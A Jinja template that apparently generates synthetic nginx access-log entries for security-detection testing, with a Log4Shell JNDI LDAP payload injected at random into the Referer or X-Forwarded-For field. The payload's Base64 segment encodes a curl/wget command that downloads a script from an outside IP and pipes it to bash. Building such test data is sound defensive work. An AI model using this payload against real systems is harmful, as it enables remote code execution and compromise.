{%- set timestamp = current_timestamp() -%}
{%- set formatted_time = timestamp | format_timestamp('%d/%b/%Y:%H:%M:%S +0000') -%}
{%- set status_codes = [400, 403, 404, 200] -%}
{%- set http_methods = ['GET', 'POST', 'HEAD'] -%}
{%- set user_agents = ['curl/7.58.0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'] -%}
{%- set uri_paths = ['/', '/api', '/login', '/images'] -%}
{%- set injection_field = ['http_referer', 'http_x_forwarded_for'] | random -%}
{%- set malicious_ip = '10.0.1.16' -%}
{%- set malicious_port = '1389' -%}
{%- set payload = '${jndi:ldap://' ~ malicious_ip ~ ':' ~ malicious_port ~ '/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]' -%}
site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1" src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="{{ formatted_time }}" protocol="HTTP/1.1" status="{{ status_codes | random }}" bytes_out="{{ random_int(200, 300) }}" bytes_in="{{ random_int(150, 200) }}" http_referer="{{ payload if injection_field == 'http_referer' else '-' }}" http_user_agent="{{ user_agents | random }}" nginx_version="1.21.3" http_x_forwarded_for="{{ payload if injection_field == 'http_x_forwarded_for' else '-' }}" http_x_header="-" uri_query="-" uri_path="{{ uri_paths | random }}" http_method="{{ http_methods | random }}" response_time="{{ (random_int(4, 10) / 1000) | round(3) }}" cookie="-" request_time="{{ (random_int(4, 10) / 1000) | round(3) }}" category="application/json" https=""